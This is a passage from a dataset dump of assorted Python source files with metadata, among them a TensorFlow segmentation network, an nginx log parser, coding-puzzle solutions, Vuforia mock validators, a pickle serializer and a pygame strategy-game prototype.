15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n return tf.nn.tanh(layers[-1]), layers\n\n def G_Net_2D_v2(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 2]\n #chns = [x // 8 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n layers += [tf.slice(tf.nn.softmax(layers[-1]) * 2.0 - 1.0, [0, 0, 0, 1], [-1, -1, -1, 1], name='segmented')]\n return layers[-1], layers\n\n def G_Net_2D_v4(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + 
[64, 32, 2]\n chns = [x // 2 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n layers += [tf.slice(tf.nn.softmax(layers[-1]) * 2.0 - 1.0, [0, 0, 0, 1], [-1, -1, -1, 1], name='segmented')]\n return layers[-1], layers\n\n def G_Net_2D_v3(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 2]\n chns = [x // 4 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n\n layers += [tf.slice(tf.nn.softmax(layers[-1]) * 2.0 - 1.0, [0, 0, 0, 1], [-1, -1, -1, 1], name='segmented')]\n return layers[-1], layers\n\n def collect_vars(self):\n all_vars = [var for var in tf.all_variables() if 'VGG' not in var.name]\n t_vars = [var for var in tf.trainable_variables() if 'VGG' not in var.name]\n vgg_vars = [var for var in tf.trainable_variables() if 'VGG' in var.name]\n\n g_vars_im = [var for var in t_vars if 'generator_im' in var.name]\n d_vars_im = [var for var in t_vars if 'discriminator_im' in var.name]\n\n assert len(g_vars_im) + len(d_vars_im) == len(t_vars), 'vars number inconsistent! (1)'\n assert len(t_vars) + len(vgg_vars) == len(tf.trainable_variables()), 'vars number inconsistent! 
(2)'\n\n var = edict({\n 'all_vars': all_vars,\n 't_vars': t_vars,\n 'g_im_vars': g_vars_im,\n 'd_im_vars': d_vars_im,\n 'vgg_vars': vgg_vars\n })\n return var\n\n def compute_losses(self):\n self.sum_wt = tf.reduce_sum(self.ph_datum_wt)\n\n l1_im, l1_im_datum = utils.compute_lxloss(self.ph_datum_wt,\n self.rs_ou_image_train,\n self.ph_gt_image, name='l1loss_im', mode='l1')\n\n ce_im, ce_im_datum = utils.compute_celoss(self.ph_datum_wt,\n self.layers[-2],\n self.ph_gt_image, name='celoss_im')\n\n P_R_IoU_FPR_F1_im, _ = utils.compute_IoU(self.ph_datum_wt,\n self.rs_ou_image_valid,\n self.ph_gt_image, 0, name='seg_eval_im')\n\n wtd_ce_im, wt_im_datum = utils.compute_weighted_celoss(self.ph_datum_wt,\n self.layers[-2],\n self.ph_gt_image,\n self.FLAGS.weight_ce, name='weighted_celoss_im')\n\n weight_decay = self.FLAGS.weight_decay * utils.compute_weight_decay(self.var['g_im_vars'])\n\n loss = edict({\n 'l1loss_im': l1_im,\n 'celoss_im': ce_im + weight_decay,\n 'wtdecay_loss_im': weight_decay,\n 'wtd_celoss_im': wtd_ce_im + weight_decay,\n 'precision': P_R_IoU_FPR_F1_im[0],\n 'recall': P_R_IoU_FPR_F1_im[1],\n 'IoU': P_R_IoU_FPR_F1_im[2],\n 'F1Score': P_R_IoU_FPR_F1_im[4]\n })\n return loss\n\n def optimize(self, optimizer):\n phases = edict({\n 'l1loss_im': 'g_im_vars',\n 'celoss_im': 'g_im_vars',\n 'wtd_celoss_im': 'g_im_vars',\n 'g_loss_im': 'g_im_vars',\n 'd_loss_im': 'd_im_vars',\n })\n phase_opts = edict({})\n logger.info('{:-^72}'.format('Experiment: {:2d} Phases'.format(len(phases))))\n for idx, (phase_name, vname) in enumerate(phases.items()):\n if phase_name in self.loss and vname in self.var:\n phase_opts[phase_name] = optimizer.compute_gradients(self.loss[phase_name], var_list=self.var[vname])\n logger.info('{:d}) {}'.format(idx, phase_name))\n else:\n logger.warning('{:d}) WARNING! 
LOSS: {:>10s} or VARS: {:>10s} NOT EXIST!'.format(idx, phase_name, vname))\n logger.info('-' * 72)\n return phase_opts","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":16049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"3257623","text":"#\n# parse a typical nginx error log like this\n#\n# 2012/11/29 19:30:02\n# [error] 15596#0: *4 open() \"/srv/active/collected-static/50x.html\" failed (2: No such file or directory),\n# client: 65.44.217.34,\n# server: ,\n# request: \"GET /api/megapage/poll/?cursor=1354216956 HTTP/1.1\",\n# upstream: \"http://0.0.0.0:9000/api/megapage/poll/?cursor=1354216956\",\n# host: \"165.225.132.103\",\n# referrer: \"http://165.225.132.103/megapage/\"\n\n\ndef nginx_error_parser(line):\n csv_list = line.split(\",\")\n date_time_message = csv_list.pop(0).split(\" \",2)\n otherinfo = dict()\n\n for l in csv_list:\n kv = l.split(\":\",1)\n if len(kv) > 1: # guard kv[1]: a field without ':' would otherwise raise IndexError\n value = kv[1].strip()\n if not value:\n value = \"-\"\n else:\n value = \"-\"\n otherinfo[kv[0].strip()] = value\n\n return date_time_message, otherinfo\n","sub_path":"sentrylogs/parsers/nginx.py","file_name":"nginx.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"128653975","text":"# !/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n https://leetcode-cn.com/problems/letter-combinations-of-a-phone-number\n\"\"\"\nclass Solution(object):\n def letterCombinations(self, digits):\n if not digits or len(digits) == 0:\n return []\n\n map = {'2': \"abc\", '3': \"def\", '4': \"ghi\", '5': \"jkl\", '6': \"mno\", '7': \"pqrs\", '8': \"tuv\", '9': \"wxyz\"}\n res = []\n\n def combinations(string, level, digits, map):\n if len(digits) == len(string):\n res.append(string)\n return\n letter = map.get(digits[level])\n for i in range(len(letter)):\n combinations(string + letter[i], level + 1, digits, map)\n\n combinations('', 0, digits, map)\n return res\n","sub_path":"Week_03/letter_combinations_of_a_phone_number.py","file_name":"letter_combinations_of_a_phone_number.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"268351935","text":"import numpy as np\nfrom scipy.ndimage import convolve\n\nSERIAL = 7803\n\n# Calculate power level\ndef power(x,y):\n\treturn (x+10)*(y*(x+10)+SERIAL) // 100 % 10 -5\n\n# Solve power of individual cells\ncell = np.fromfunction(lambda i,j: power(i,j), (300,300), dtype=int)\n\n# Convolution Filter to calculate local power\nkernel = np.ones((3,3), dtype=int) # actual kernel is inverted in x and y\npower = convolve(cell, kernel, mode='constant', cval=0)\n\nhome = np.unravel_index(np.argmax(power), cell.shape) # Center of power\nprint(np.array(home)-1)","sub_path":"2018/Q11/q11_1.py","file_name":"q11_1.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"239752294","text":"\"\"\"\nInput validators to use in the mock.\n\"\"\"\n\nfrom typing import Dict, List\n\nfrom mock_vws.database import VuforiaDatabase\n\nfrom .active_flag_validators import validate_active_flag\nfrom .auth_validators import (\n validate_access_key_exists,\n validate_auth_header_exists,\n validate_auth_header_has_signature,\n validate_authorization,\n)\nfrom .content_length_validators import (\n 
validate_content_length_header_is_int,\n validate_content_length_header_not_too_large,\n validate_content_length_header_not_too_small,\n)\nfrom .content_type_validators import validate_content_type_header_given\nfrom .date_validators import (\n validate_date_format,\n validate_date_header_given,\n validate_date_in_range,\n)\nfrom .image_validators import (\n validate_image_color_space,\n validate_image_data_type,\n validate_image_encoding,\n validate_image_format,\n validate_image_is_image,\n validate_image_size,\n)\nfrom .json_validators import validate_json\nfrom .key_validators import validate_keys\nfrom .metadata_validators import (\n validate_metadata_encoding,\n validate_metadata_size,\n validate_metadata_type,\n)\nfrom .name_validators import (\n validate_name_characters_in_range,\n validate_name_length,\n validate_name_type,\n)\nfrom .project_state_validators import validate_project_state\nfrom .target_validators import validate_target_id_exists\nfrom .width_validators import validate_width\n\n\ndef run_services_validators(\n request_text: str,\n request_path: str,\n request_headers: Dict[str, str],\n request_body: bytes,\n request_method: str,\n databases: List[VuforiaDatabase],\n) -> None:\n \"\"\"\n Run all validators.\n\n Args:\n request_text: The content of the request.\n request_path: The path of the request.\n request_headers: The headers sent with the request.\n request_body: The body of the request.\n request_method: The HTTP method of the request.\n databases: All Vuforia databases.\n \"\"\"\n validate_auth_header_exists(request_headers=request_headers)\n validate_auth_header_has_signature(request_headers=request_headers)\n validate_access_key_exists(\n request_headers=request_headers,\n databases=databases,\n )\n validate_authorization(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n validate_project_state(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n validate_target_id_exists(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n validate_json(\n request_text=request_text,\n request_body=request_body,\n request_method=request_method,\n )\n validate_keys(\n request_text=request_text,\n request_path=request_path,\n request_method=request_method,\n )\n validate_metadata_type(request_text=request_text)\n validate_metadata_encoding(request_text=request_text)\n validate_metadata_size(request_text=request_text)\n validate_active_flag(request_text=request_text)\n validate_image_data_type(request_text=request_text)\n validate_image_encoding(request_text=request_text)\n validate_image_is_image(request_text=request_text)\n validate_image_format(request_text=request_text)\n validate_image_color_space(request_text=request_text)\n\n validate_image_size(request_text=request_text)\n\n validate_name_type(request_text=request_text)\n validate_name_length(request_text=request_text)\n validate_name_characters_in_range(\n request_text=request_text,\n request_method=request_method,\n request_path=request_path,\n )\n\n validate_width(request_text=request_text)\n validate_content_type_header_given(\n request_headers=request_headers,\n request_method=request_method,\n )\n\n validate_date_header_given(request_headers=request_headers)\n\n 
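# Aside: a minimal, self-contained sketch of the fail-fast validator chain
# that run_services_validators implements above. Each check raises on the
# first failure, so the order of the calls encodes error precedence. The
# names below are illustrative, not part of the mock_vws API.
class ValidationError(Exception):
    """Raised by a validator to short-circuit the chain."""

def validate_auth_given(headers):
    if 'Authorization' not in headers:
        raise ValidationError('Authorization header is missing')

def validate_date_given(headers):
    if 'Date' not in headers:
        raise ValidationError('Date header is missing')

def run_validators(headers):
    # Earlier checks mask later ones, mirroring how the chain above
    # reports only the first failing validation.
    for check in (validate_auth_given, validate_date_given):
        check(headers)

# run_validators({'Authorization': 'VWS key:sig'}) raises ValidationError
# because no Date header was given.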
validate_date_format(request_headers=request_headers)\n validate_date_in_range(request_headers=request_headers)\n\n validate_content_length_header_is_int(\n request_headers=request_headers,\n request_body=request_body,\n )\n validate_content_length_header_not_too_large(\n request_headers=request_headers,\n request_body=request_body,\n )\n\n validate_content_length_header_not_too_small(\n request_headers=request_headers,\n request_body=request_body,\n )\n","sub_path":"src/mock_vws/_services_validators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"57301229","text":"#vim: ts=4 expandtab\n\nimport cherrypy\nimport json\n\nfrom smiljan.server.device import SmiljanDevice\nfrom smiljan.server.generic import GenericPage\n\nclass SmiljanAjax(GenericPage):\n\n def __init__(self, threads):\n self._device_info = {}\n for name, thread in threads.items():\n if thread.isAlive():\n setattr(self, name, SmiljanDevice(name, thread))\n self._device_info[name] = \\\n {\n \"parser\": thread.options[\"parser\"],\n \"samples_per_second\": thread._SAMPLE_HERTZ,\n }\n\n \"\"\" Get rid of removed device \"\"\"\n def report_terminate(self, name = \"\"):\n if name:\n del self._device_info[name]\n\n @cherrypy.expose\n def json_get_devices(self):\n cherrypy.response.headers['Content-Type'] = 'application/json'\n for name in self._device_info.keys():\n self._device_info[name][\"url\"] = cherrypy.url(\"/\" + name)\n\n return json.dumps(self._device_info, sort_keys=1, indent=4)\n\n\n @cherrypy.expose\n def index(self):\n if len(self._device_info) > 1:\n body = \"\\n\"\n for name in self._device_info.keys():\n body += \"\\t\\n\"\n body += \"\\t\\t\\n\"\n body += \"\\t\\n\"\n body += \"
\\n\"\n body += \"\\t\\t\\t %s Multimeter \\n\" % (cherrypy.url(\"/\" + name), name.upper())\n body += \"\\t\\n
\\n\"\n elif len(self._device_info) == 1:\n name = self._device_info.keys().pop()\n raise cherrypy.HTTPRedirect(cherrypy.url(\"/\" + name))\n else:\n body = \"No valid devices found!\"\n\n return super(SmiljanAjax, self).index(body = body)\n","sub_path":"smiljan/server/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"218508907","text":"my_Number = int (input(\"Enter your Number: \"))\n\ndef division (num):\n flag = 0\n ret_val = num\n if num % 3 == 0:\n flag += 1\n ret_val = \"Fizz\"\n if num % 5 == 0:\n flag += 1\n ret_val = \"Buzz\"\n if flag == 2:\n ret_val =\"FizzBuzz\"\n return ret_val\n\nprint (division(my_Number))","sub_path":"7_divisiondecision.py","file_name":"7_divisiondecision.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"212878972","text":"#!/usr/bin/python\n#Cody Pinchot Babysitter kata\n#Valid format for times is \"10:00AM\"\n\nfrom datetime import datetime, timedelta\n\t\ndef checkstarttime(min_time,max_time,start_time): \n\tst = (datetime.strptime(start_time, \"%I:%M%p\").hour)\n\tmit = (datetime.strptime(min_time, \"%I:%M%p\").hour)\n\tmat = (datetime.strptime(max_time, \"%I:%M%p\").hour)\n\n\tif st < mit and st > mat:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef checkendtime(min_time,max_time,end_time):\n\tmat = (datetime.strptime(max_time, \"%I:%M%p\").hour)\n\tmit = (datetime.strptime(min_time, \"%I:%M%p\").hour)\n\tet = (datetime.strptime(end_time, \"%I:%M%p\").hour)\n\n\tif et > mat and et < mit:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef checkbedtimemin(start_time,bed_time,end_time):\n\tst = (datetime.strptime(start_time, \"%I:%M%p\").hour)\n\tet = (datetime.strptime(end_time, \"%I:%M%p\").hour)\n\tbt = (datetime.strptime(bed_time, \"%I:%M%p\").hour)\n\tif bt < st and bt < et:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef payrate(start_time,bed_time,end_time):\n\trate1 = 12\n\trate2 = 8\n\trate3 = 16\n\tst = ((datetime.strptime(start_time, \"%I:%M%p\")).hour)\n\tet = ((datetime.strptime(end_time, \"%I:%M%p\")).hour)\n\t\n\tif bed_time == \"\":\n\t\tif et <= 23 and et >= 5 and st <= 23 and st >= 5:\n\t\t\tpaycheck = rate1 * len(range(st,et))\n\t\t\treturn paycheck\n\t\telif st < 5 and et < 5:\n\t\t\tpaycheck = rate3 * len(range(st,et))\n\t\t\treturn paycheck\n\t\telse:\n\t\t\trate1hours = len(range(st,24))\n\t\t\trate3hours = len(range(0,et))\n\t\t\tpaycheck = (rate1 * rate1hours) + (rate3 * rate3hours)\n\t\t\treturn paycheck\n\telse:\n\t\tbt = ((datetime.strptime(bed_time, \"%I:%M%p\")).hour)\n\t\tif bt <= 23 and bt >= 5 and st > 5:\n\t\t\trate1hours = len(range(st,bt))\n\t\t\trate2hours = len(range(bt,24))\n\t\t\trate3hours = len(range(0,et))\n\t\t\tpaycheck = (rate1 * rate1hours) + (rate2 * rate2hours) + (rate3 * rate3hours)\n\t\t\treturn paycheck\n\t\telif st < 5:\n\t\t\trate3hours = len(range(st,et))\n\t\t\tpaycheck = (rate3 * rate3hours)\n\t\t\treturn paycheck\n\t\telse:\n\t\t\trate1hours = len(range(st,24))\n\t\t\trate3hours = len(range(0,et))\n\t\t\tpaycheck = (rate1 * rate1hours) + (rate3 * rate3hours)\n\t\t\treturn paycheck\t\n\n#def main():\n\n#main()","sub_path":"babysitter.py","file_name":"babysitter.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"19813245","text":"class Solution:\n def fourSum(self, nums: 
List[int], target: int) -> List[List[int]]:\n if nums == 0 and len(nums)<=3:\n return []\n\n n = len(nums)\n nums.sort() \n ans = list()\n \n for d in range(n-3):\n if d > 0 and nums[d] == nums[d - 1]: \n continue\n for first in range(d+1, n-2):\n if first > d+1 and nums[first] == nums[first - 1]: \n continue\n third = n - 1\n tar = target - nums[first] - nums[d]\n for second in range(first + 1, n-1):\n if second > first + 1 and nums[second] == nums[second - 1]:\n continue\n while second < third and nums[second] + nums[third] > tar:\n third -= 1\n if second == third:\n break\n if nums[second] + nums[third] == tar:\n ans.append([nums[d], nums[first], nums[second], nums[third]])\n \n return ans","sub_path":"Week_05/foursum.py","file_name":"foursum.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522880544","text":"import pickle\r\nimport cloudpickle\r\nfrom Serializer.base_json_serializer import BaseJsonSerializer\r\n\r\n\r\nclass PickleSerializer(BaseJsonSerializer):\r\n @classmethod\r\n def dump(cls, python_object, file_name):\r\n try:\r\n with open(file_name, 'wb') as wfb:\r\n if(cls.is_lambda_function(python_object)):\r\n pickle.dump(cloudpickle.dumps(python_object), wfb)\r\n else:\r\n pickle.dump(python_object, wfb)\r\n except TypeError:\r\n pass\r\n\r\n @classmethod\r\n def dumps(cls, python_object):\r\n try:\r\n if(cls.is_lambda_function(python_object)):\r\n return cloudpickle.dumps(python_object)\r\n else:\r\n return pickle.dumps(python_object)\r\n except TypeError:\r\n return None\r\n\r\n @classmethod\r\n def load(cls, file_name):\r\n try:\r\n with open(file_name, 'rb') as rfb:\r\n object_from_file = pickle.load(rfb)\r\n with open(file_name, 'rb') as rfb:\r\n if type(object_from_file) is bytes:\r\n return pickle.loads(pickle.load(rfb))\r\n else:\r\n return pickle.load(rfb)\r\n except (FileNotFoundError, TypeError):\r\n return None\r\n\r\n @classmethod\r\n def loads(cls, str_to_deserialize):\r\n\r\n try:\r\n return pickle.loads(str_to_deserialize)\r\n except TypeError:\r\n return None\r\n","sub_path":"Python_Serializer/Serializer/pickle_serializer.py","file_name":"pickle_serializer.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"393173893","text":"\n\n#calss header\nclass _INPUT():\n\tdef __init__(self,): \n\t\tself.name = \"INPUT\"\n\t\tself.definitions = [u'to put information into a computer or other piece of electronic equipment: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_input.py","file_name":"_input.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445303597","text":"import pygame, os, math\nfrom pygame.locals import *\npygame.init()\n\nclass Vector():\n '''\n Class:\n creates operations to handle vectors such\n as direction, position, and speed\n '''\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self): # used for printing vectors\n return \"(%s, %s)\"%(self.x, self.y)\n\n def __getitem__(self, key):\n if key == 0:\n return self.x\n elif key == 1:\n return self.y\n else:\n raise IndexError(\"This \"+str(key)+\" key is not a vector key!\")\n\n def __sub__(self, o): 
# subtraction\n return Vector(self.x - o.x, self.y - o.y)\n\n def length(self): # get length (used for normalize)\n return math.sqrt((self.x**2 + self.y**2)) \n\n def normalize(self): # divides a vector by its length\n l = self.length()\n if l != 0:\n return (self.x / l, self.y / l)\n return None\n\nclass Sprite(pygame.sprite.Sprite):\n \n def __init__(self, Type):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(os.path.join('sprites', Type.Image1))\n self.rect = self.image.get_rect()\n self.image.set_colorkey((255,255,255))\n self.Type = Type\n self.isAttack = False\n self.isBuilding = False\n self.attackCounter = 0\n self.researchCounter = 0\n\n self.trueX = Type.x # created because self.rect.center does not hold\n self.trueY = Type.y # decimal values but these do\n self.rect.center = (self.trueX, self.trueY) # set starting position\n self.speed = Type.Speed # movement speed of the sprite\n self.speedX = 0 # speed in x direction\n self.speedY = 0 # speed in y direction\n try:\n self.Health = Type.unitHealth #local store of class health amount\n except:\n self.Health = 0\n\n self.targetSprite = None #start with no sprite targetted (for attacks only)\n self.target = None #start with no destination\n\n def get_direction(self, target):\n '''\n Function:\n takes total distance from sprite.center\n to the sprites target\n (gets direction to move)\n Returns:\n a normalized vector\n Parameters:\n - self\n - target\n x,y coordinates of the sprites target\n can be any x,y coorinate pair in\n brackets [x,y]\n or parentheses (x,y)\n '''\n if self.target: # if the square has a target\n position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value\n target = Vector(target[0], target[1]) # and one from the target x,y\n self.dist = target - position # get total distance between target and position\n\n direction = self.dist.normalize() # normalize so its constant in all directions\n return direction\n\n def distance_check(self, dist):\n '''\n Function:\n tests if the total distance from the\n sprite to the target is smaller than the\n ammount of distance that would be normal\n for the sprite to travel\n (this lets the sprite know if it needs\n to slow down. 
we want it to slow\n down before it gets to it's target)\n Returns:\n bool\n Parameters:\n - self\n - dist\n this is the total distance from the\n sprite to the target\n can be any x,y value pair in\n brackets [x,y]\n or parentheses (x,y)\n '''\n dist_x = dist[0] ** 2 # gets absolute value of the x distance\n dist_y = dist[1] ** 2 # gets absolute value of the y distance\n t_dist = dist_x + dist_y # gets total absolute value distance\n speed = self.speed ** 2 # gets aboslute value of the speed\n\n if t_dist < (speed): # read function description above\n return True\n\n \n\n def updatePosition(self, AttackList):\n '''\n Function:\n gets direction to move then applies\n the distance to the sprite.center\n ()\n Parameters:\n - self\n '''\n \n if self.targetSprite != None:\n if self.targetSprite.Health <= 0:\n self.targetSprite = None\n if self.isAttack == True:\n self.kill()\n else:\n if self.isAttack == False:\n actualDist = rangeCheck(self, self.targetSprite)\n if actualDist <= (self.Type.attackType.attackRange * 50 + (self.targetSprite.Type.size)) and self.attackCounter >= (self.Type.attackType.attackCooldown * 30): #range check\n AttackList.add(Sprite(self.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = self.trueX #sets start pos\n thisAttack.trueY = self.trueY\n thisAttack.targetSprite = self.targetSprite #saves target sprite for retargetting\n thisAttack.target = self.targetSprite.rect.center #sets target\n if self.Type.attackType.Name == \"Volatile Burst\":\n self.kill()\n self.target = None\n elif actualDist > (self.Type.attackType.attackRange * 50 + (self.targetSprite.Type.size)):\n self.target = self.targetSprite.rect.center\n else:\n self.target = self.targetSprite.rect.center\n \n self.dir = self.get_direction(self.target) # get direction\n if self.dir: # if there is a direction to move\n \n if self.distance_check(self.dist): # if we need to stop\n self.rect.center = self.target # center the sprite on the target\n \n else: # if we need to move normal\n self.trueX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant\n self.trueY += (self.dir[1] * self.speed)\n self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center\n\n angleRad = math.atan2(self.dist[1], self.dist[0]) #finds angle\n angleDeg = math.degrees(angleRad) #converts to degrees\n self.image = pygame.transform.rotate(self.image, (-angleDeg - 90)) #rotates sprite to match, and adjusts angle\n return AttackList \n \n def updateAnim(self, animCounter):\n if animCounter >= 15 and animCounter <= 29:\n self.image = pygame.image.load(os.path.join('sprites', self.Type.Image2))\n self.image.set_colorkey((255,255,255)) #half the time use sprite 2\n animCounter += 1\n elif animCounter >= 0 and animCounter <= 14:\n self.image = pygame.image.load(os.path.join('sprites', self.Type.Image1))\n self.image.set_colorkey((255,255,255)) #otherwise use 1\n animCounter += 1\n else:\n animCounter = 0\n self.image = pygame.image.load(os.path.join('sprites', self.Type.Image1))\n self.image.set_colorkey((255,255,255)) #reset counter, and use 1\n return animCounter\n\nclass unitType():\n Name = \"\"\n x = 100\n y = 100\n size = 64\n Image1 = None\n Image2 = None\n Speed = 0.0\n Team = None\n buildTime = 0\n unitAttack = None\n unitHealth = 100\n unitFlying = False\n\nclass attackType():\n x = 100\n y = 100\n size = 32\n Image1 = None\n Image2 = None\n Speed = 10\n Name = \"\"\n attackDamage = 0\n 
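# Aside: distance_check above compares squared distances (dist_x ** 2 +
# dist_y ** 2 against speed ** 2), which avoids a per-frame math.sqrt call.
# A standalone sketch of the same trick; the names are illustrative:
import math

def will_overshoot(dx, dy, speed):
    # Equivalent to math.hypot(dx, dy) < speed, without the square root.
    return dx * dx + dy * dy < speed * speed

assert will_overshoot(1.0, 1.0, 2.0) == (math.hypot(1.0, 1.0) < 2.0)
assert will_overshoot(3.0, 4.0, 5.0) == (math.hypot(3.0, 4.0) < 5.0)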
attackAir = False\n attackGround = False\n attackRange = 0\n attackCooldown = 0.0\n\n def TakeDamage(self, Sprite):\n if Sprite.Type.unitFlying == True:\n Sprite.Health -= (self.attackDamage * self.attackAir) #multiply damamge by flying or not, to cancel out if can't hit air/ground\n else:\n Sprite.Health -= (self.attackDamage * self.attackGround)\n\nclass buildingType():\n x = 100\n y = 100\n size = 128\n unitHealth = 100\n Image1 = None\n Speed = 0\n Name = \"\"\n Team = None\n unitFlying = False\n isResearching = False\n researchType = None\n hotKey = [] #letters associated with the units in unitorder\n unitOrder = [] #the units which correspond to the letter of the same index in hotKeys\n\n def research(self, selectedObject, letter):\n keyUsed = False\n usedAt = 0\n for n in range(0, len(selectedObject.Type.hotKey)): #find index of key used, if it it\n if selectedObject.Type.hotKey[n] == letter:\n keyUsed = True\n usedAt = n\n if keyUsed == True:\n selectedObject.Type.isResearching = True #starts research/build required item, if this key is used\n for object in unitTypeList:\n if object.Name == selectedObject.Type.unitOrder[usedAt]:\n selectedObject.Type.researchType = object #sets the research type to a unit\n\ndef getSpriteByPosition(position,group):\n for index,spr in enumerate(group):\n if (index == position):\n return spr\n return False\n\ndef approxEquals(clickedObject,x2,y2):\n if clickedObject.trueX < (x2 + (clickedObject.Type.size / 2)) and clickedObject.trueX > (x2 - (clickedObject.Type.size / 2)) and clickedObject.trueY < (y2 + (clickedObject.Type.size / 2)) and clickedObject.trueY > (y2 - (clickedObject.Type.size / 2)):\n return True\n else:\n return False\n\ndef rangeCheck(selectedObject, target):\n objPosition = Vector(selectedObject.rect.centerx, selectedObject.rect.centery)\n targetPosition = Vector(target.rect.centerx, target.rect.centery)\n vectorDist = targetPosition - objPosition\n actualDist = vectorDist.length() #finds length between units\n return actualDist\n \n\ndef main(animCounter, unitTypeList, attackTypeList, buildingTypeList):\n screenSize = [800,600]\n screen = pygame.display.set_mode((screenSize[0],screenSize[1])) #initial settings\n pygame.display.set_caption(\"Attack Test 2 - Auto & Building\")\n background_image = pygame.image.load(os.path.join('sprites', 'TempBG 3600x600.png')).convert()\n imageSize = [3600,600]\n horCoordinate = 0 #bg scrolling vars\n verCoordinate = 0\n horVelocity = 0\n verVelocity = 0\n minVer = 0\n minHor = 0\n maxVer = imageSize[1] - screenSize[1]\n maxHor = imageSize[0] - screenSize[0]\n \n \n UnitList = pygame.sprite.OrderedUpdates() #list holding all sprites of Units\n AttackList = 